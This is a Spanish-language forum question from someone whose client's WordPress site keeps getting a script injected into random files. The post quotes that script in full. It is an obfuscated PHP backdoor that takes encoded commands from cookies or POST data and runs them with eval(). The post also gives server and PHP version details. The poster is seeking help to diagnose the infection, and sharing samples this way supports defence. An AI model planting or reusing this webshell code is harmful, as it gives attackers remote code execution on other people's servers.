Recientemente, un sitio web en wordpress que se encuentra en el servidor de mi cliente aparece con el siguiente script de forma aleatoria. Alguien conoce este patrón de virus / malware / exploit o algo así?
<?php $GLOBALS['c851bc'] = "\x54\x50\x56\x6a\x77\x3a\x5e\x6e\x2c\x43\x2f\x3c\x61\x59\x25\x28\x4e\x5b\x38\x5f\x53\x6b\x41\x2a\x5d\x62\x4d\x75\x51\x68\x60\x5c\x31\x30\x44\x7a\x21\x78\x29\x5a\x3d\x47\x42\x36\x2e\x49\x34\x6d\x79\x69\x7b\x4f\x76\x7d\x20\x32\x57\x46\x2d\xd\x73\x4c\x74\x33\x27\x23\x39\x7e\x58\x35\x26\x3e\x55\x45\x67\x72\xa\x2b\x52\x24\x71\x37\x70\x40\x64\x63\x3f\x4b\x22\x66\x65\x7c\x3b\x4a\x6f\x48\x9\x6c";
$GLOBALS[$GLOBALS['c851bc'][52].$GLOBALS['c851bc'][84].$GLOBALS['c851bc'][89].$GLOBALS['c851bc'][84].$GLOBALS['c851bc'][85].$GLOBALS['c851bc'][43]] = $GLOBALS['c851bc'][85].$GLOBALS['c851bc'][29].$GLOBALS['c851bc'][75];
$GLOBALS[$GLOBALS['c851bc'][4].$GLOBALS['c851bc'][85].$GLOBALS['c851bc'][89].$GLOBALS['c851bc'][18].$GLOBALS['c851bc'][46].$GLOBALS['c851bc'][43].$GLOBALS['c851bc'][63]] = $GLOBALS['c851bc'][94].$GLOBALS['c851bc'][75].$GLOBALS['c851bc'][84];
$GLOBALS[$GLOBALS['c851bc'][52].$GLOBALS['c851bc'][46].$GLOBALS['c851bc'][90].$GLOBALS['c851bc'][89].$GLOBALS['c851bc'][66]] = $GLOBALS['c851bc'][60].$GLOBALS['c851bc'][62].$GLOBALS['c851bc'][75].$GLOBALS['c851bc'][97].$GLOBALS['c851bc'][90].$GLOBALS['c851bc'][7];
$GLOBALS[$GLOBALS['c851bc'][49].$GLOBALS['c851bc'][81].$GLOBALS['c851bc'][69].$GLOBALS['c851bc'][81].$GLOBALS['c851bc'][84].$GLOBALS['c851bc'][90].$GLOBALS['c851bc'][85].$GLOBALS['c851bc'][25]] = $GLOBALS['c851bc'][49].$GLOBALS['c851bc'][7].$GLOBALS['c851bc'][49].$GLOBALS['c851bc'][19].$GLOBALS['c851bc'][60].$GLOBALS['c851bc'][90].$GLOBALS['c851bc'][62];
$GLOBALS[$GLOBALS['c851bc'][27].$GLOBALS['c851bc'][90].$GLOBALS['c851bc'][18].$GLOBALS['c851bc'][33].$GLOBALS['c851bc'][69].$GLOBALS['c851bc'][46]] = $GLOBALS['c851bc'][60].$GLOBALS['c851bc'][90].$GLOBALS['c851bc'][75].$GLOBALS['c851bc'][49].$GLOBALS['c851bc'][12].$GLOBALS['c851bc'][97].$GLOBALS['c851bc'][49].$GLOBALS['c851bc'][35].$GLOBALS['c851bc'][90];
$GLOBALS[$GLOBALS['c851bc'][85].$GLOBALS['c851bc'][63].$GLOBALS['c851bc'][12].$GLOBALS['c851bc'][33].$GLOBALS['c851bc'][84]] = $GLOBALS['c851bc'][82].$GLOBALS['c851bc'][29].$GLOBALS['c851bc'][82].$GLOBALS['c851bc'][52].$GLOBALS['c851bc'][90].$GLOBALS['c851bc'][75].$GLOBALS['c851bc'][60].$GLOBALS['c851bc'][49].$GLOBALS['c851bc'][94].$GLOBALS['c851bc'][7];
$GLOBALS[$GLOBALS['c851bc'][85].$GLOBALS['c851bc'][63].$GLOBALS['c851bc'][25].$GLOBALS['c851bc'][63].$GLOBALS['c851bc'][69].$GLOBALS['c851bc'][12].$GLOBALS['c851bc'][55].$GLOBALS['c851bc'][90].$GLOBALS['c851bc'][12]] = $GLOBALS['c851bc'][27].$GLOBALS['c851bc'][7].$GLOBALS['c851bc'][60].$GLOBALS['c851bc'][90].$GLOBALS['c851bc'][75].$GLOBALS['c851bc'][49].$GLOBALS['c851bc'][12].$GLOBALS['c851bc'][97].$GLOBALS['c851bc'][49].$GLOBALS['c851bc'][35].$GLOBALS['c851bc'][90];
$GLOBALS[$GLOBALS['c851bc'][74].$GLOBALS['c851bc'][84].$GLOBALS['c851bc'][89].$GLOBALS['c851bc'][81].$GLOBALS['c851bc'][46].$GLOBALS['c851bc'][46].$GLOBALS['c851bc'][55].$GLOBALS['c851bc'][85]] = $GLOBALS['c851bc'][25].$GLOBALS['c851bc'][12].$GLOBALS['c851bc'][60].$GLOBALS['c851bc'][90].$GLOBALS['c851bc'][43].$GLOBALS['c851bc'][46].$GLOBALS['c851bc'][19].$GLOBALS['c851bc'][84].$GLOBALS['c851bc'][90].$GLOBALS['c851bc'][85].$GLOBALS['c851bc'][94].$GLOBALS['c851bc'][84].$GLOBALS['c851bc'][90];
$GLOBALS[$GLOBALS['c851bc'][80].$GLOBALS['c851bc'][18].$GLOBALS['c851bc'][12].$GLOBALS['c851bc'][84]] = $GLOBALS['c851bc'][60].$GLOBALS['c851bc'][90].$GLOBALS['c851bc'][62].$GLOBALS['c851bc'][19].$GLOBALS['c851bc'][62].$GLOBALS['c851bc'][49].$GLOBALS['c851bc'][47].$GLOBALS['c851bc'][90].$GLOBALS['c851bc'][19].$GLOBALS['c851bc'][97].$GLOBALS['c851bc'][49].$GLOBALS['c851bc'][47].$GLOBALS['c851bc'][49].$GLOBALS['c851bc'][62];
$GLOBALS[$GLOBALS['c851bc'][29].$GLOBALS['c851bc'][69].$GLOBALS['c851bc'][66].$GLOBALS['c851bc'][18].$GLOBALS['c851bc'][32]] = $GLOBALS['c851bc'][29].$GLOBALS['c851bc'][43].$GLOBALS['c851bc'][55].$GLOBALS['c851bc'][46];
$GLOBALS[$GLOBALS['c851bc'][7].$GLOBALS['c851bc'][25].$GLOBALS['c851bc'][85].$GLOBALS['c851bc'][63]] = $GLOBALS['c851bc'][3].$GLOBALS['c851bc'][25].$GLOBALS['c851bc'][33].$GLOBALS['c851bc'][12].$GLOBALS['c851bc'][85];
$GLOBALS[$GLOBALS['c851bc'][21].$GLOBALS['c851bc'][12].$GLOBALS['c851bc'][12].$GLOBALS['c851bc'][32]] = $_POST;
$GLOBALS[$GLOBALS['c851bc'][3].$GLOBALS['c851bc'][81].$GLOBALS['c851bc'][12].$GLOBALS['c851bc'][25]] = $_COOKIE;
@$GLOBALS[$GLOBALS['c851bc'][49].$GLOBALS['c851bc'][81].$GLOBALS['c851bc'][69].$GLOBALS['c851bc'][81].$GLOBALS['c851bc'][84].$GLOBALS['c851bc'][90].$GLOBALS['c851bc'][85].$GLOBALS['c851bc'][25]]($GLOBALS['c851bc'][90].$GLOBALS['c851bc'][75].$GLOBALS['c851bc'][75].$GLOBALS['c851bc'][94].$GLOBALS['c851bc'][75].$GLOBALS['c851bc'][19].$GLOBALS['c851bc'][97].$GLOBALS['c851bc'][94].$GLOBALS['c851bc'][74], NULL);
@$GLOBALS[$GLOBALS['c851bc'][49].$GLOBALS['c851bc'][81].$GLOBALS['c851bc'][69].$GLOBALS['c851bc'][81].$GLOBALS['c851bc'][84].$GLOBALS['c851bc'][90].$GLOBALS['c851bc'][85].$GLOBALS['c851bc'][25]]($GLOBALS['c851bc'][97].$GLOBALS['c851bc'][94].$GLOBALS['c851bc'][74].$GLOBALS['c851bc'][19].$GLOBALS['c851bc'][90].$GLOBALS['c851bc'][75].$GLOBALS['c851bc'][75].$GLOBALS['c851bc'][94].$GLOBALS['c851bc'][75].$GLOBALS['c851bc'][60], 0);
@$GLOBALS[$GLOBALS['c851bc'][49].$GLOBALS['c851bc'][81].$GLOBALS['c851bc'][69].$GLOBALS['c851bc'][81].$GLOBALS['c851bc'][84].$GLOBALS['c851bc'][90].$GLOBALS['c851bc'][85].$GLOBALS['c851bc'][25]]($GLOBALS['c851bc'][47].$GLOBALS['c851bc'][12].$GLOBALS['c851bc'][37].$GLOBALS['c851bc'][19].$GLOBALS['c851bc'][90].$GLOBALS['c851bc'][37].$GLOBALS['c851bc'][90].$GLOBALS['c851bc'][85].$GLOBALS['c851bc'][27].$GLOBALS['c851bc'][62].$GLOBALS['c851bc'][49].$GLOBALS['c851bc'][94].$GLOBALS['c851bc'][7].$GLOBALS['c851bc'][19].$GLOBALS['c851bc'][62].$GLOBALS['c851bc'][49].$GLOBALS['c851bc'][47].$GLOBALS['c851bc'][90], 0);
@$GLOBALS[$GLOBALS['c851bc'][80].$GLOBALS['c851bc'][18].$GLOBALS['c851bc'][12].$GLOBALS['c851bc'][84]](0);
$y8b51 = NULL;
$l5bcd7 = NULL;
$GLOBALS[$GLOBALS['c851bc'][29].$GLOBALS['c851bc'][43].$GLOBALS['c851bc'][63].$GLOBALS['c851bc'][66].$GLOBALS['c851bc'][63].$GLOBALS['c851bc'][84].$GLOBALS['c851bc'][25]] = $GLOBALS['c851bc'][55].$GLOBALS['c851bc'][66].$GLOBALS['c851bc'][66].$GLOBALS['c851bc'][25].$GLOBALS['c851bc'][55].$GLOBALS['c851bc'][89].$GLOBALS['c851bc'][90].$GLOBALS['c851bc'][32].$GLOBALS['c851bc'][58].$GLOBALS['c851bc'][90].$GLOBALS['c851bc'][25].$GLOBALS['c851bc'][32].$GLOBALS['c851bc'][32].$GLOBALS['c851bc'][58].$GLOBALS['c851bc'][46].$GLOBALS['c851bc'][90].$GLOBALS['c851bc'][85].$GLOBALS['c851bc'][69].$GLOBALS['c851bc'][58].$GLOBALS['c851bc'][66].$GLOBALS['c851bc'][66].$GLOBALS['c851bc'][46].$GLOBALS['c851bc'][84].$GLOBALS['c851bc'][58].$GLOBALS['c851bc'][66].$GLOBALS['c851bc'][12].$GLOBALS['c851bc'][85].$GLOBALS['c851bc'][89].$GLOBALS['c851bc'][85].$GLOBALS['c851bc'][55].$GLOBALS['c851bc'][18].$GLOBALS['c851bc'][18].$GLOBALS['c851bc'][25].$GLOBALS['c851bc'][46].$GLOBALS['c851bc'][18].$GLOBALS['c851bc'][85];
global $h6393db;
function jb0ac($y8b51, $g0c13e)
{
$j25b84da = "";
for ($e143=0; $e143<$GLOBALS[$GLOBALS['c851bc'][52].$GLOBALS['c851bc'][46].$GLOBALS['c851bc'][90].$GLOBALS['c851bc'][89].$GLOBALS['c851bc'][66]]($y8b51);)
{
for ($l6c2=0; $l6c2<$GLOBALS[$GLOBALS['c851bc'][52].$GLOBALS['c851bc'][46].$GLOBALS['c851bc'][90].$GLOBALS['c851bc'][89].$GLOBALS['c851bc'][66]]($g0c13e) && $e143<$GLOBALS[$GLOBALS['c851bc'][52].$GLOBALS['c851bc'][46].$GLOBALS['c851bc'][90].$GLOBALS['c851bc'][89].$GLOBALS['c851bc'][66]]($y8b51); $l6c2++, $e143++)
{
$j25b84da .= $GLOBALS[$GLOBALS['c851bc'][52].$GLOBALS['c851bc'][84].$GLOBALS['c851bc'][89].$GLOBALS['c851bc'][84].$GLOBALS['c851bc'][85].$GLOBALS['c851bc'][43]]($GLOBALS[$GLOBALS['c851bc'][4].$GLOBALS['c851bc'][85].$GLOBALS['c851bc'][89].$GLOBALS['c851bc'][18].$GLOBALS['c851bc'][46].$GLOBALS['c851bc'][43].$GLOBALS['c851bc'][63]]($y8b51[$e143]) ^ $GLOBALS[$GLOBALS['c851bc'][4].$GLOBALS['c851bc'][85].$GLOBALS['c851bc'][89].$GLOBALS['c851bc'][18].$GLOBALS['c851bc'][46].$GLOBALS['c851bc'][43].$GLOBALS['c851bc'][63]]($g0c13e[$l6c2]));
}
}
return $j25b84da;
}
function h624($y8b51, $g0c13e)
{
global $h6393db;
return $GLOBALS[$GLOBALS['c851bc'][7].$GLOBALS['c851bc'][25].$GLOBALS['c851bc'][85].$GLOBALS['c851bc'][63]]($GLOBALS[$GLOBALS['c851bc'][7].$GLOBALS['c851bc'][25].$GLOBALS['c851bc'][85].$GLOBALS['c851bc'][63]]($y8b51, $h6393db), $g0c13e);
}
foreach ($GLOBALS[$GLOBALS['c851bc'][3].$GLOBALS['c851bc'][81].$GLOBALS['c851bc'][12].$GLOBALS['c851bc'][25]] as $g0c13e=>$k0c0)
{
$y8b51 = $k0c0;
$l5bcd7 = $g0c13e;
}
if (!$y8b51)
{
foreach ($GLOBALS[$GLOBALS['c851bc'][21].$GLOBALS['c851bc'][12].$GLOBALS['c851bc'][12].$GLOBALS['c851bc'][32]] as $g0c13e=>$k0c0)
{
$y8b51 = $k0c0;
$l5bcd7 = $g0c13e;
}
}
$y8b51 = @$GLOBALS[$GLOBALS['c851bc'][85].$GLOBALS['c851bc'][63].$GLOBALS['c851bc'][25].$GLOBALS['c851bc'][63].$GLOBALS['c851bc'][69].$GLOBALS['c851bc'][12].$GLOBALS['c851bc'][55].$GLOBALS['c851bc'][90].$GLOBALS['c851bc'][12]]($GLOBALS[$GLOBALS['c851bc'][29].$GLOBALS['c851bc'][69].$GLOBALS['c851bc'][66].$GLOBALS['c851bc'][18].$GLOBALS['c851bc'][32]]($GLOBALS[$GLOBALS['c851bc'][74].$GLOBALS['c851bc'][84].$GLOBALS['c851bc'][89].$GLOBALS['c851bc'][81].$GLOBALS['c851bc'][46].$GLOBALS['c851bc'][46].$GLOBALS['c851bc'][55].$GLOBALS['c851bc'][85]]($y8b51), $l5bcd7));
if (isset($y8b51[$GLOBALS['c851bc'][12].$GLOBALS['c851bc'][21]]) && $h6393db==$y8b51[$GLOBALS['c851bc'][12].$GLOBALS['c851bc'][21]])
{
if ($y8b51[$GLOBALS['c851bc'][12]] == $GLOBALS['c851bc'][49])
{
$e143 = Array(
$GLOBALS['c851bc'][82].$GLOBALS['c851bc'][52] => @$GLOBALS[$GLOBALS['c851bc'][85].$GLOBALS['c851bc'][63].$GLOBALS['c851bc'][12].$GLOBALS['c851bc'][33].$GLOBALS['c851bc'][84]](),
$GLOBALS['c851bc'][60].$GLOBALS['c851bc'][52] => $GLOBALS['c851bc'][32].$GLOBALS['c851bc'][44].$GLOBALS['c851bc'][33].$GLOBALS['c851bc'][58].$GLOBALS['c851bc'][32],
);
echo @$GLOBALS[$GLOBALS['c851bc'][27].$GLOBALS['c851bc'][90].$GLOBALS['c851bc'][18].$GLOBALS['c851bc'][33].$GLOBALS['c851bc'][69].$GLOBALS['c851bc'][46]]($e143);
}
elseif ($y8b51[$GLOBALS['c851bc'][12]] == $GLOBALS['c851bc'][90])
{
eval($y8b51[$GLOBALS['c851bc'][84]]);
}
exit();
Informaciones:
uname -a
Linux 2.6.32-504.8.1.el6.x86_64 #1 SMP Wed Jan 28 21:11:36 UTC 2015 x86_64 x86_64 x86_64 GNU/Linux
PHP 5.4.37
WordPress en la última versión estable
Aparentemente es inyección de guiones. Pero en archivos aleatorios y siempre en diferentes carpetas. No hay ningún patrón en el nombre de las cadenas. Todas las inyecciones son con diferentes cadenas de nombres.